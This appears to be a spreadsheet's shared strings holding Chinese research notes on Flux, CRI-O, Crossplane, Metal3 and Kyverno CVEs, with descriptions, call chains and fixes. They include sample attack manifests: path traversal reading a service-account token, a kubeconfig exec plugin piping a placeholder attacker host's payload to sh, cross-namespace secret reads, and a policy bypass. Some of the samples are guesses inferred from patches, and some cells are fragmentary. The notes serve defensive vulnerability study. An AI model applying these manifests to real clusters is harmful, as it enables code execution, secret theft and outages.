}
解析函数：不同阶段使用不同的解析函数缺乏统一的处理标准
api-server 的序列化和 controller 的反序列化函数存在差异
</t>
  </si>
  <si>
    <t>调用深度：1
UnmarshalJSON -》 time.ParseDuration(str)</t>
  </si>
  <si>
    <t xml:space="preserve">
Flux2是一款用于保持Kubernetes集群与配置源同步的工具，其Helm控制器是一个Kubernetes操作器，支持以声明式方式管理Helm图表版本。Helm控制器与Helm SDK深度集成。在Helm SDK中发现的一个漏洞影响flux2 v0.0.17至v0.32.0版本以及helm-controller v0.0.4至v0.23.0版本，特定数据输入会导致高内存消耗。在某些平台中，这可能引发控制器崩溃并停止处理协调任务。在共享集群的多租户环境中，租户可通过创建使控制器崩溃的HelmRelease，导致其他所有租户的Helm版本无法完成协调过程。该漏洞已在flux2 v0.32.0及helm-controller v0.23.0版本中得到修复。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   - 共享集群多租户环境  
   - 所有使用未修复版本`helm-controller`的集群</t>
  </si>
  <si>
    <t>**攻击方式**：  
   租户提交精心构造的`HelmRelease`，利用Helm SDK解析漏洞导致内存耗尽 → 控制器OOM崩溃 → 停止协调其他租户的Helm操作</t>
  </si>
  <si>
    <t>HelmRelease
# 创建恶意的 HelmRelease
apiVersion: helm.toolkit.fluxcd.io/v2beta1
kind: HelmRelease
metadata:
  name: malicious-release
spec:
  # 包含可触发内存问题的特定数据
  # 利用 Helm SDK 的漏洞
根据补丁推理出：
---
apiVersion: helm.toolkit.fluxcd.io/v2beta1
kind: HelmRelease
metadata:
  name: malicious-release
spec:
  # 潜在注入点 1
  valuesKey: "大量数据或特殊字符..."
  # 潜在注入点 2  
  path: "大量数据或特殊字符..."</t>
  </si>
  <si>
    <t>apiVersion: helm.toolkit.fluxcd.io/v2beta1
   kind: HelmRelease
   metadata:
     name: malicious-release
   spec:
     chart:
       spec:
         chart: ./malicious-chart  # 可能包含复杂模板
     values:
       nestedData: &amp;anchor
         - [重复超大数组或深度嵌套结构]</t>
  </si>
  <si>
    <t xml:space="preserve">oss fuzzer 发现的
- Helm SDK 中的内存消耗问题
- 特定输入可导致内存耗尽
- 可能导致控制器崩溃
- 影响所有 HelmRelease 的处理
相关
与CVE-2022-36055 相关
</t>
  </si>
  <si>
    <t>Flux2 is a tool for keeping Kubernetes clusters in sync with sources of configuration, and Flux's helm-controller is a Kubernetes operator that allows one to declaratively manage Helm chart releases. Helm controller is tightly integrated with the Helm SDK. A vulnerability found in the Helm SDK that affects flux2 v0.0.17 until v0.32.0 and helm-controller v0.0.4 until v0.23.0 allows for specific data inputs to cause high memory consumption. In some platforms, this could cause the controller to panic and stop processing reconciliations. In a shared cluster multi-tenancy environment, a tenant could create a HelmRelease that makes the controller panic, denying all other tenants from their Helm releases being reconciled. Patches are available in flux2 v0.32.0 and helm-controller v0.23.0.</t>
  </si>
  <si>
    <t xml:space="preserve">https://github.com/fluxcd/helm-controller/compare/v0.22.2...v0.23.0
Enable RecoverPanic option on reconciler ：
https://github.com/fluxcd/helm-controller/pull/516（添加崩溃后恢复的机制）
Add validation to TargetPath and ValuesKey：https://github.com/fluxcd/helm-controller/pull/520（在crd中添加字段格式限制：Add validation to TargetPath and ValuesKey）
</t>
  </si>
  <si>
    <t>校验责任发生变化-K8s安全策略忽视（忽视Limtrange)</t>
  </si>
  <si>
    <t>组合和合并来自多个来源的 Helm chart 值，
这个函数的主要功能是从多个来源（包括ConfigMaps、Secrets、外部URL等）收集和合并配置值，然后生成用于Helm Chart部署的最终配置。它直接参与了将用户提供的输入转换为系统配置的过程，这正是配置注入类漏洞可能发生的地方。
在helm-controller 中:
reconcileRelease-&gt;ChartValuesFromReferences-&gt;
   // TODO(hidde): this is a bit of hack, as it mimics the way the option string is passed
    //     to Helm from a CLI perspective. Given the parser is however not publicly accessible
    //     while it contains all logic around parsing the target path, it is a fair trade-off.
    if err := ReplacePathValue(result, ref.TargetPath, string(valuesData)); err != nil {
       return nil, NewErrValuesReference(namespacedName, ref, ErrValueMerge, err)
    }
    continue
#TODO 这里没有定位到具体出现问题的helm sdk 的函数位置
相关的函数信息： https://nvd.nist.gov/vuln/detail/cve-2022-36055</t>
  </si>
  <si>
    <t>增加check:
# 修复前：
# 缺乏对特定字段的长度和格式限制
# 修复后：
spec:
  properties:
    valuesKey:
      description: "ValuesKey is the data key where the values.yaml or a specific value can be found at"
      # 添加了长度限制
      maxLength: 253
      # 添加了格式验证
      pattern: ^[\-._a-zA-Z0-9]+$
      type: string
    path:
      maxLength: 250
      pattern: ^([a-zA-Z0-9_\-.\\\/]|\[[0-9]{1,5}\])+$
----
关键改进：
a) 字符集限制：
   - 只允许字母数字
   - 允许特殊字符 -._
   - 严格控制输入字符范围
b) 长度限制：
   - valuesKey: 最大 253 字符
   - path: 最大 250 字符
c) 格式验证：
   - 使用正则表达式验证
   - 限制字符组合方式</t>
  </si>
  <si>
    <t xml:space="preserve">
Flux是一个面向Kubernetes的开放式可扩展持续交付解决方案。kustomize-controller组件存在路径遍历漏洞，攻击者可通过构造恶意的`kustomization.yaml`文件访问控制器Pod文件系统中的敏感数据，在多租户部署环境中可能进一步实现权限提升。临时解决方案包括在用户CI/CD流水线中部署自动化工具以验证`kustomization.yaml`文件是否符合特定策略规范。该漏洞已在kustomize-controller v0.24.0版本中修复，相关修复已包含在flux2 v0.29.0版本中。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**  
- 攻击者需有权限创建/修改`Kustomization`资源（多租户场景下的RBAC配置缺陷）  
- 影响所有使用kustomize-controller且版本低于v0.24.0的Flux CD实例</t>
  </si>
  <si>
    <t>0的Flux CD实例</t>
  </si>
  <si>
    <t>Kustomization
---
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
  name: exploit
spec:
  path: "../../../../etc/secret"  # 注入点：利用路径遍历
  # 或
  path: "/etc/secret"            # 注入点：使用绝对路径 # 路径遍历
-&gt;
api/v1beta2/kustomization_types.go: 
kustomization.Spec.Path</t>
  </si>
  <si>
    <t>apiVersion: kustomize.toolkit.fluxcd.io/v1beta2
kind: Kustomization
metadata:
  name: malicious-kustomize
spec:
  path: "../../../etc"  # 路径遍历到宿主机的敏感目录
  sourceRef:
    kind: GitRepository
    name: fake-repo
  secretGenerator:
  - name: stolen-secrets
    files:
    - source: ../../var/run/secrets/kubernetes.io/serviceaccount/token  # 读取Pod敏感文件</t>
  </si>
  <si>
    <t>Flux is an open and extensible continuous delivery solution for Kubernetes. Path Traversal in the kustomize-controller via a malicious `kustomization.yaml` allows an attacker to expose sensitive data from the controller’s pod filesystem and possibly privilege escalation in multi-tenancy deployments. Workarounds include automated tooling in the user's CI/CD pipeline to validate `kustomization.yaml` files conform with specific policies. This vulnerability is fixed in kustomize-controller v0.24.0 and included in flux2 v0.29.0.</t>
  </si>
  <si>
    <t>调用深度：3
reconcile-&gt;r.generate-&gt;func (kg *KustomizeGenerator) WriteFile(dirPath string) error-&gt; os.WriteFile(kfile, kd, os.ModePerm)
调用深度：4
reconcile-&gt;r.build-&gt;secureBuildKustomization-&gt;k.Run(fs, dirPath)-&gt;ldr, err := fLdr.NewLoader(lr, path, fSys)
创建加载器隐含文件读取操作
这里使用提供的文件系统 fSys 和路径 path 创建了一个加载器，这个加载器会用于后续的文件操作。
后续有2个文件读取操作：
在加载 OpenAPI 规范文件时的显式读取：
if openApiPath, exists := kt.Kustomization().OpenAPI["path"]; exists {
    bytes, err = ldr.Load(filepath.Join(ldr.Root(), openApiPath))
    if err != nil {
        return nil, err
    }
}
kt.load(): kt.Load() 很可能会加载 kustomization.yaml 或相关文件。
m, err = kt.MakeCustomizedResMap(): 隐含文件读取</t>
  </si>
  <si>
    <t>增加check
----
官方修复：
- 在 v0.24.0 版本修复
- 实现新的文件系统处理机制
// 修复前：使用普通文件系统
fs := filesys.MakeFsOnDisk()
// 修复后：使用安全的文件系统
fs, err := securefs.MakeFsOnDiskSecure(kg.root)
- 限制文件访问在工作目录内
// 新增工作目录概念
func (r *KustomizationReconciler) generate(
    kustomization kustomizev1.Kustomization,
    workDir string,    // 新增工作目录参数
    dirPath string,
) error
- 阻止对外部文件的引用
临时解决方案：
- 使用 conftest 等工具检查 kustomization.yaml
- 实施文件路径访问策略
- 限制特定路径的访问
---
详细修复方案：
a) 文件系统访问控制：
   - 限制文件操作在工作目录内
   - 禁止访问外部文件
b) 路径验证：
   - 确保所有操作在根目录内
   - 防止路径遍历
c) 安全构建：
   - 使用安全的文件系统实现
   - 增加目录边界检查</t>
  </si>
  <si>
    <t xml:space="preserve">1 check 点：
func (r *KustomizationReconciler) build(-&gt;SecureBuildKustomization
-&gt; fs, err := securefs.MakeFsOnDiskSecure(root)
2. check点：
 WriteFile -&gt; 
func (kg *KustomizeGenerator) generateKustomization(dirPath string) error {-》
支配os.writefile -同一函数
check 点和os.writefile（sink点） 在同函数中且直接支配sink点 </t>
  </si>
  <si>
    <t>CVE-2022-24878</t>
  </si>
  <si>
    <t xml:space="preserve">
Flux是一个面向Kubernetes的开放且可扩展的持续交付解决方案。kustomize-controller中存在的路径遍历漏洞可通过恶意构造的`kustomization.yaml`文件触发，允许攻击者在控制器层面引发拒绝服务（DoS）。临时缓解方案包括在用户CI/CD流水线中部署自动化工具来验证`kustomization.yaml`文件是否符合特定策略规范。该漏洞已在kustomize-controller v0.24.0版本中修复，并随flux2 v0.29.0版本同步更新，建议用户立即升级至安全版本。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**  
- 使用Flux CD且允许用户提交自定义`Kustomization`资源的集群  
- 影响`kustomize-controller`可用性（DoS）</t>
  </si>
  <si>
    <t>**攻击方式/过程**</t>
  </si>
  <si>
    <t>Kustomization
具体的注入的字段应该是
Kustomization.spec.path
攻击者可以通过构造循环引用的 kustomization 文件，在修复前导致控制器无限递归，最终耗尽资源。修复通过跟踪已访问路径来防止这种攻击。
---
1. 攻击向量构造：
# 主 kustomization.yaml
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
  name: exploit
spec:
  path: ./base   # 指向含有恶意 kustomization.yaml 的目录
2. 恶意的kustomiztion.yaml 文件
# ./base/kustomization.yaml
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- ../overlay1    # 指向 overlay1 目录
# ./overlay1/kustomization.yaml
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- ../base       # 循环引用回 base 目录
3. 漏洞触发流程：
// 1. 控制器处理 CRD，调用 build
func (r *KustomizationReconciler) build(...) {
    // 2. 解密和处理环境文件
    if err = dec.DecryptEnvSources(dirPath); err != nil {
        ...
    }
}
// 3. 递归处理 kustomization 文件
func recurseKustomizationFiles(root, path string, ...) {
    // 4. 加载 kustomization 文件
    kus, err := secureLoadKustomizationFile(root, relPath)
    // 5. 处理资源引用
    for _, res := range kus.Resources {
        // 6. 递归处理引用的资源
        recurseKustomizationFiles(root, res, visit, visited)
    }
}
// 修复前没有跟踪已访问的路径
// base -&gt; overlay1 -&gt; base -&gt; overlay1 循环继续
---
resource: types/kustomization.go中：Kustomization.Resource
types/kustomization.go 中的 Kustomization:
// 这是 Kustomize 工具本身使用的类型定义
type Kustomization struct {
    // 用于描述 kustomization.yaml 文件的内容
    Resources []string                  // 引用的资源
    Generators []string                // 生成器配置
    SecretGenerator []SecretArgs      // Secret 生成器
    // ...其他配置字段
}
api/v1beta2/kustomization_types.go 中的 Kustomization：
// 这是 Flux 的自定义资源(CRD)定义
type Kustomization struct {
    metav1.TypeMeta                    // K8s 类型元数据
    metav1.ObjectMeta                  // K8s 对象元数据
    Spec KustomizationSpec            // Flux 特定的规范
    Status KustomizationStatus        // Flux 特定的状态
}
关系：
第一个是 Kustomize 工具的内部类型
第二个是 Flux 的 CRD，用于管理 Kustomize 资源
Flux 控制器会将 CRD 中的配置转换为 Kustomize 内部类型
Flux Kustomization CRD 
    ↓
Controller 处理
    ↓
转换为 Kustomize 内部类型
    ↓
执行 Kustomize 操作</t>
  </si>
  <si>
    <t>apiVersion: kustomize.toolkit.fluxcd.io/v1beta2
kind: Kustomization
metadata:
  name: malicious-kustomization
spec:
  path: "../../../../../etc"  # 恶意路径遍历
  sourceRef:
    kind: GitRepository
    name: example-repo</t>
  </si>
  <si>
    <t>Flux is an open and extensible continuous delivery solution for Kubernetes. Path Traversal in the kustomize-controller via a malicious `kustomization.yaml` allows an attacker to cause a Denial of Service at the controller level. Workarounds include automated tooling in the user's CI/CD pipeline to validate `kustomization.yaml` files conform with specific policies. This vulnerability is fixed in kustomize-controller v0.24.0 and included in flux2 v0.29.0. Users are recommended to upgrade.</t>
  </si>
  <si>
    <t>增加check
----
官方修复：
- 在 v0.24.0 版本修复
- 实现新的文件系统处理机制
// 修复前：使用普通文件系统
fs := filesys.MakeFsOnDisk()
// 修复后：使用安全的文件系统
fs, err := securefs.MakeFsOnDiskSecure(kg.root)
- 限制文件访问在工作目录内
// 新增工作目录概念
func (r *KustomizationReconciler) generate(
    kustomization kustomizev1.Kustomization,
    workDir string,    // 新增工作目录参数
    dirPath string,
) error
- 阻止对外部文件的引用
临时解决方案：
- 使用 conftest 等工具检查 kustomization.yaml
- 实施文件路径访问策略
- 限制特定路径的访问
---
引入工作目录概念，限制文件操作范围
改进了资源解密处理
增强了文件路径验证
防止循环引用或递归结构
----
关键修复点：
// 使用 visited 映射跟踪已处理的路径
if _, ok := visited[absPath]; ok {
    // 发现循环引用，直接返回
    return nil
}
visited[absPath] = struct{}{}</t>
  </si>
  <si>
    <t>CVE-2022-24817</t>
  </si>
  <si>
    <t xml:space="preserve">
Flux2是一款面向Kubernetes的开放可扩展持续交付解决方案。Flux2版本0.1.0至0.29.0、helm-controller 0.1.0至v0.19.0以及kustomize-controller 0.1.0至v0.23.0存在通过恶意Kubeconfig实施代码注入的漏洞。在多租户部署场景中，若控制器的服务账户具备提升权限，该漏洞可能导致权限提升。临时缓解措施包括通过验证准入Webhook禁用相关功能，限制用户在Flux的Kustomization和HelmRelease对象中设置spec.kubeConfig字段。其他缓解方案包括在控制器Pod上应用限制性AppArmor和SELinux配置文件以限制可执行二进制文件。该漏洞已在kustomize-controller v0.23.0和helm-controller v0.19.0中修复，这两个修复版本已包含在flux2 v0.29.0中。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   - 多租户集群中允许用户创建/修改Flux CRD的场景  
   - 控制器ServiceAccount具有高权限（如cluster-admin）</t>
  </si>
  <si>
    <t>**攻击方式**：  
   - 攻击者通过提交恶意`Kustomization/HelmRelease`资源，注入含`exec`插件的kubeconfig，触发控制器执行任意二进制文件（如`curl | sh`类攻击链）</t>
  </si>
  <si>
    <t>Kustomization` and `HelmRelease` objects.
1. 命令注入点在Kubeconfig文件中
#命令注入点： Kubeconfig
apiVersion: v1
kind: Secret
metadata:
  name: malicious-kubeconfig
type: Opaque
data:
  value: &lt;base64-encoded malicious kubeconfig&gt;
-----
2. crd资源引用恶意的kubeconfig文件
# 关键注入点：Kustomization CRD
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
  name: exploit
spec:
  # 注入点 1: 直接引用带有命令执行的 kubeconfig
  kubeConfig:
    secretRef:
      name: exploit-config
# 或者 HelmRelease CRD
apiVersion: helm.toolkit.fluxcd.io/v2beta1
kind: HelmRelease
metadata:
  name: exploit
spec:
  # 注入点 2: 同样可以引用恶意 kubeconfig
  kubeConfig:
    secretRef:
      name: exploit-config
攻击链：
Flux CRD (Kustomization/HelmRelease)
    ↓
引用恶意 kubeconfig Secret
    ↓
kubeconfig 中的命令执行
    ↓
控制器执行命令
关键字段：
spec.kubeConfig.secretRef: # CRD 中引用 Secret 的字段
  name: &lt;secret-name&gt;</t>
  </si>
  <si>
    <t>apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
     kind: Kustomization
     metadata:
       name: malicious-kustomization
     spec:
       kubeConfig:
         secretRef:
           name: attacker-controlled-secret  # 包含恶意kubeconfig的Secret
       path: "./"
       targetNamespace: critical-system</t>
  </si>
  <si>
    <t>Flux2 is an open and extensible continuous delivery solution for Kubernetes. Flux2 versions between 0.1.0 and 0.29.0, helm-controller 0.1.0 to v0.19.0, and kustomize-controller 0.1.0 to v0.23.0 are vulnerable to Code Injection via malicious Kubeconfig. In multi-tenancy deployments this can also lead to privilege escalation if the controller's service account has elevated permissions. Workarounds include disabling functionality via Validating Admission webhooks by restricting users from setting the `spec.kubeConfig` field in Flux `Kustomization` and `HelmRelease` objects. Additional mitigations include applying restrictive AppArmor and SELinux profiles on the controller’s pod to limit what binaries can be executed. This vulnerability is fixed in kustomize-controller v0.23.0 and helm-controller v0.19.0, both included in flux2 v0.29.0</t>
  </si>
  <si>
    <t>路径 1：
- 创建/修改 Kustomization/HelmRelease
- 引用包含恶意命令的 kubeconfig Secret
路径 2：
- 修改现有 Kustomization/HelmRelease
- 改变其 kubeConfig 引用
---
攻击示例：
# 步骤 1：创建恶意 kubeconfig
apiVersion: v1
kind: Config
clusters:
- name: default
  cluster:
    server: https://kubernetes.default.svc
contexts:
- name: default
  context:
    cluster: default
    user: default
current-context: default
users:
- name: default
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      command: "/bin/sh"
      args:
      - "-c"
      - "恶意命令，如 curl http://攻击者服务器/payload | sh"
# 步骤2 创建包含恶意kubeconfig的secret
apiVersion: v1
kind: Secret
metadata:
  name: malicious-kubeconfig
  namespace: default  # 或您希望部署的命名空间
type: Opaque
data:
  # 经过 base64 编码的恶意 kubeconfig
  value: &lt;base64-encoded malicious kubeconfig&gt;
# 步骤 3：在 Kustomization 中引用
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
spec:
  kubeConfig:
    secretRef:
      name: malicious-kubeconfig</t>
  </si>
  <si>
    <t xml:space="preserve">命令执行
reconcile-&gt;impersonation := NewKustomizeImpersonation(kustomization, r.Client, r.StatusPoller, r.DefaultServiceAccount, r.KubeConfigOpts)
 kubeClient, statusPoller, err := impersonation.GetClient(ctx)    
GetClient-&gt;clientForKubeConfig -&gt;
TransportConfig()
</t>
  </si>
  <si>
    <t>controller
准入控制器：
# 使用准入控制器限制 kubeConfig 字段
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
...
spec:
  rules:
  - operations: ["CREATE", "UPDATE"]
    apiGroups: ["kustomize.toolkit.fluxcd.io"]
    apiVersions: ["v1beta1"]
    resources: ["kustomizations"]
    scope: "Namespaced"
he functionality can be disabled via Validating Admission webhooks (e.g. OPA Gatekeeper, Kyverno) by restricting users from being able to set the spec.kubeConfig field in Flux Kustomization and HelmRelease objects.
Applying restrictive AppArmor and SELinux profiles on the controller’s pod to limit what binaries can be executed.</t>
  </si>
  <si>
    <t xml:space="preserve">控制器校验：
新增配置选项，不是简单增加check
对应的选项：KubeConfigOptions， InsecureExecProvider
在reconcile 入口顶层关键操作之前进行了设置
reconcile-&gt; impersonation := NewKustomizeImpersonation(kustomization, r.Client, r.StatusPoller, r.DefaultServiceAccount, r.KubeConfigOpts)  
 kubeClient, statusPoller, err := impersonation.GetClient(ctx)-&gt; clientForKubeConfig-&gt; runtimeClient.KubeConfig(restConfig, ki.kubeConfigOpts)
准入控制器校验：OPA Gatekeeper, Kyverno) 配置
</t>
  </si>
  <si>
    <t xml:space="preserve">
在cri-o中发现一个漏洞。该问题允许通过使用特制的环境变量向/etc/passwd文件中添加任意行。</t>
  </si>
  <si>
    <t>**攻击面或影响范围**  
   所有使用CRI-O运行时且未修复该漏洞的Kubernetes节点，攻击者需具备创建Pod的权限（如通过被入侵的ServiceAccount或RBAC配置错误）。</t>
  </si>
  <si>
    <t>**攻击者利用方式**  
   通过Pod定义注入精心构造的环境变量，CRI-O在容器启动时错误处理该变量，导致在容器内`/etc/passwd`追加任意内容（如添加UID 0用户）。</t>
  </si>
  <si>
    <t>apiVersion: v1
     kind: Pod
     metadata:
       name: malicious-pod
     spec:
       containers:
       - name: alpine
         image: alpine:latest
         env:
         - name: "ATTACKER_PAYLOAD"  # 恶意构造的环境变量名
           value: "恶意内容触发CRI-O漏洞"
         command: ["/bin/sh"]
         args: ["-c", "sleep 1d"]</t>
  </si>
  <si>
    <t>A vulnerability was found in cri-o. This issue allows the addition of arbitrary lines into /etc/passwd by use of a specially crafted environment variable.（container.env）</t>
  </si>
  <si>
    <t>复杂的来源-资源抽象校不一致</t>
  </si>
  <si>
    <t xml:space="preserve">
Crossplane是一个无需编写代码即可构建云原生控制平面的框架。在1.11.5、1.12.3和1.13.0之前的版本中，高权限用户可创建引用任意超大镜像的Package（该镜像会被Crossplane解析），可能导致耗尽所有可用内存，进而使容器被OOMKilled。由于创建Package所需的高权限以及控制器具有的最终一致性特性，该漏洞的实际影响有限。该问题已在1.11.5、1.12.3和1.13.0版本中修复。</t>
  </si>
  <si>
    <t>**攻击面或影响范围**：  
   - 仅限于拥有`Package`创建权限的高特权用户（如Cluster Admin）。  
   - 影响Crossplane控制器Pod（可能因OOM崩溃）。</t>
  </si>
  <si>
    <t>**攻击者利用方式**：  
   - 创建/更新`Package`资源，指定一个包含超大体积的容器镜像（例如通过填充垃圾数据）。  
   - Crossplane控制器在解析镜像元数据时因内存耗尽被OOMKilled。</t>
  </si>
  <si>
    <t>apiVersion: pkg.crossplane.io/v1
kind: Provider
metadata:
  name: malicious-provider-package
spec:
  package: "malicious-registry.example.com/huge-image:latest"
  packagePullPolicy: Always
  revisionActivationPolicy: Automatic
  revisionHistoryLimit: 1
  skipDependencyResolution: false</t>
  </si>
  <si>
    <t>apiVersion: pkg.crossplane.io/v1
     kind: Provider
     metadata:
       name: malicious-provider
     spec:
       package: "malicious-registry/large-image:latest"  # 引用极大体积的镜像</t>
  </si>
  <si>
    <t>攻击者通过提供恶意构造的特大镜像文件
利用Crossplane-runtime解析器在处理大文件时的缺陷
导致内存耗尽，最终导致容器崩溃
ada logic 2023 security-audit:ADA-XP-23-16: 有详细的分析和简单的poc</t>
  </si>
  <si>
    <t>文件操作：
k8s.io/apimachinery/pkg/util/yaml.(*YAMLReader).Read() will exhaust
memory if reading from a large reader. The Crossplane-runtime parser parses an image
from a remote registry using Kubernetes’ yaml parser:
https://github.com/crossplane/crossplane-runtime/blob/511b39fa560d40daecec2f9288850f92cc6
2e14b/pkg/parser/parser.go#L94</t>
  </si>
  <si>
    <t xml:space="preserve">
crossplane-runtime 是用于构建 Crossplane 及其相关堆栈中 Kubernetes 控制器的 Go 语言库集合。在受影响版本中，已具备高权限的用户若能够创建或更新 Composition，即可在补丁的 `ToFieldPath` 中指定任意高位索引，这可能导致选定该 Composition 的组合资源时出现内存过度消耗。Composition 允许用户指定将元素插入数组任意索引位置的补丁操作。当为组合资源选定 Composition 时，系统会评估补丁配置：若指定索引超出目标切片当前长度，Crossplane 将自动扩展该切片至指定索引，此操作可能引发内存使用量激增，最终导致 Pod 因内存不足（OOM）被终止。虽然索引在解析时已被限制为 uint32 类型的最大值（4294967295），但该数值仍存在不必要的过大风险。此漏洞已在 1.11.2、1.10.3 和 1.9.2 版本中修复，建议用户尽快升级。无法立即升级的用户可通过临时措施限制 Composition 的写入权限，仅允许管理员用户操作。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   - 攻击面：具有`Composition`资源写权限的高权限用户（如集群管理员或受信用户）。  
   - 影响范围：使用Crossplane且允许非受控用户操作`Composition`的集群。</t>
  </si>
  <si>
    <t>**攻击方式与过程**：  
   - 攻击者创建或更新一个`Composition`，在`patches`中指定高索引（如`4294967295`）。  
   - 当该`Composition`被`CompositeResource`引用时，Crossplane尝试扩展目标数组至该索引，分配超大内存，触发Pod OOM-Killed。</t>
  </si>
  <si>
    <t>apiVersion: apiextensions.crossplane.io/v1
     kind: Composition
     spec:
       resources:
         - name: example
           patches:
             - type: FromCompositeFieldPath
               fromFieldPath: "metadata.name"
               toFieldPath: "spec.containers[4294967295].name"  # 恶意高索引值</t>
  </si>
  <si>
    <t>crossplane-runtime is a set of go libraries used to build Kubernetes controllers in Crossplane and its related stacks. In affected versions an already highly privileged user able to create or update Compositions can specify an arbitrarily high index in a patch's `ToFieldPath`, which could lead to excessive memory usage once such Composition is selected for a Composite resource. Compositions allow users to specify patches inserting elements into arrays at an arbitrary index. When a Composition is selected for a Composite Resource, patches are evaluated and if a specified index is greater than the current size of the target slice, Crossplane will grow that slice up to the specified index, which could lead to an excessive amount of memory usage and therefore the Pod being OOM-Killed. The index is already capped to the maximum value for a uint32 (4294967295) when parsed, but that is still an unnecessarily large value. This issue has been addressed in versions 1.11.2, 1.10.3, and 1.9.2. Users are advised to upgrade. Users unable to upgrade can restrict write privileges on Compositions to only admin users as a workaround.</t>
  </si>
  <si>
    <t>Patched versions
1.11.2, 1.10.3, 1.9.2
实际的修复位置在crossplane-runtime中：
https://github.com/crossplane/crossplane-runtime/pull/390/commits
crossplane只替换了crossplane-runtime的版本</t>
  </si>
  <si>
    <t xml:space="preserve"> func (p *Paved) setValue(s Segments, value any) err
-&gt; 没办法确定具体的类别</t>
  </si>
  <si>
    <t xml:space="preserve">
Bare Metal Operator（BMO）实现了用于管理Metal3中裸机主机的Kubernetes API。`BareMetalHost`（BMH）CRD允许将已配置主机的`userData`、`metaData`和`networkData`指定为指向Kubernetes Secret的链接。这些字段包含Secret的`Name`和`Namespace`，这意味着0.8.0、0.6.2和0.5.2之前版本的baremetal-operator会从任意命名空间读取`Secret`。具有创建或编辑`BareMetalHost`权限的用户可通过将其作为某主机的`userData`（该主机不必是真实物理机，可以是某处的虚拟机）进行配置，从而从其他命名空间外泄`Secret`。BMO仅读取名为`value`（或`userData`、`metaData`、`networkData`）的键值，这在一定程度上限制了暴露范围。但`value`可能是一个较常见的键名。不同命名空间中_其他_`BareMetalHost`使用的Secret始终存在风险。通常只有集群管理员才具有创建/编辑`BareMetalHost`的RBAC权限。此漏洞仅在集群存在非管理员用户且用户权限被限制在各自命名空间时具有实际影响。该补丁阻止BMO接受来自其他命名空间的Secret链接作为BMH输入，所有BMH配置仅从相同命名空间读取。该问题已在BMO v0.7.0、v0.6.2和v0.5.2版本中修复，用户应升级至这些版本。升级前需将BMC Secret复制到对应BMH所在的命名空间，升级后删除旧Secret。临时解决方案可将BMO RBAC配置为命名空间范围的Secret访问权限（而非集群范围），以阻止BMO访问其他命名空间的Secret。</t>
  </si>
  <si>
    <t>io/v1alpha1
   kind: BareMetalHost
   metadata:
     name: malicious-host
   spec:
     userData:
       name: victim-secret   # 跨命名空间Secret名称
       namespace: kube-system # 攻击者指定其他命名空间
     metaData:
       name: victim-secret
       namespace: kube-system
     networkData:
       name: victim-secret
       namespace: kube-system
   ```</t>
  </si>
  <si>
    <t>**攻击者利用方式**  
   - 创建或修改`BareMetalHost`资源，将`userData`等字段指向其他命名空间的`Secret`。  
   - BMO控制器读取这些`Secret`时泄露数据（即使未实际配置裸机主机）。</t>
  </si>
  <si>
    <t>apiVersion: metal3.io/v1alpha1
   kind: BareMetalHost
   metadata:
     name: malicious-host
   spec:
     userData:
       name: victim-secret   # 跨命名空间Secret名称
       namespace: kube-system # 攻击者指定其他命名空间
     metaData:
       name: victim-secret
       namespace: kube-system
     networkData:
       name: victim-secret
       namespace: kube-system</t>
  </si>
  <si>
    <t>crd资源的设计运行跨namespace 读取敏感密钥信息
----
跨命名空间数据窃取：
攻击者在自己有权限的命名空间中创建/编辑BMH资源
在BMH的userData中指定目标Secret的名称和其所在的命名空间
BMO读取目标Secret并将其用于主机配置（潜在地将Secret泄露）
攻击者可以从日志、错误信息或配置的主机中获取Secret内容
机密信息获取：
攻击者可以访问其他用户命名空间中的Secret
这些Secret可能包含敏感凭证、密钥或配置
--------
信息提取方法：
直接读取：如果BMO将Secret内容输出到日志
间接读取：如果Secret内容被用于配置可访问的主机
错误信息：如果处理过程中发生错误并包含Secret内容
多种利用变体：
配置中提供了利用userData的示例
同样可以利用metaData和networkData字段
甚至可以同时尝试多个字段来获取不同的Secret</t>
  </si>
  <si>
    <t xml:space="preserve">
Kyverno是一款专为Kubernetes设计的策略引擎。当存在名为"disallow-privileged-containers"的kyverno ClusterPolicy时，攻击者可通过在任意命名空间中创建PolicyException来覆盖该策略。根据设计，PolicyExceptions可被全局应用。管理员可能未意识到拥有非kyverno命名空间操作权限的用户可利用此机制创建策略例外。该漏洞已在1.13.0版本中修复。</t>
  </si>
  <si>
    <t>**攻击面或影响范围**  
   - 攻击者需具备在任意命名空间创建`PolicyException`的权限  
   - 影响所有受Kyverno策略约束的集群资源（如Pod/Deployment）</t>
  </si>
  <si>
    <t>**攻击方式与过程**  
   - 步骤1：攻击者创建跨命名空间的`PolicyException`，关联目标ClusterPolicy  
   - 步骤2：在允许的命名空间部署特权容器（如`securityContext.privileged: true`），绕过策略拦截</t>
  </si>
  <si>
    <t>apiVersion: kyverno.io/v2alpha1
   kind: PolicyException
   metadata:
     name: bypass-privileged
     namespace: attacker-ns  # 攻击者在任意非kyverno命名空间创建
   spec:
     exceptions:
     - policyName: disallow-privileged-containers
       ruleNames: ["validate-privileged"]
     podSelector:
       matchLabels:
         app: malicious-pod</t>
  </si>
  <si>
    <t>这个漏洞的核心问题是 Kyverno 设计中的一个缺陷：
Kyverno 允许通过创建 PolicyException 资源来为特定工作负载提供策略豁免
设计上，PolicyException 可以从任何命名空间被消费，而不仅限于发起请求的命名空间
管理员可能没有意识到这一点，误以为只有拥有特定命名空间权限的用户才能创建对应的例外
实际上，拥有任何命名空间权限的用户都可以创建能绕过集群安全策略的例外
漏洞的关键在于：Kyverno设计上允许任何命名空间的PolicyException影响集群级别的策略决策。这打破了命名空间隔离的安全边界。</t>
  </si>
  <si>
    <t>CVE-2021-27099（ 说明类似的检测方法可扩展到其他的云平台配置上）</t>
  </si>
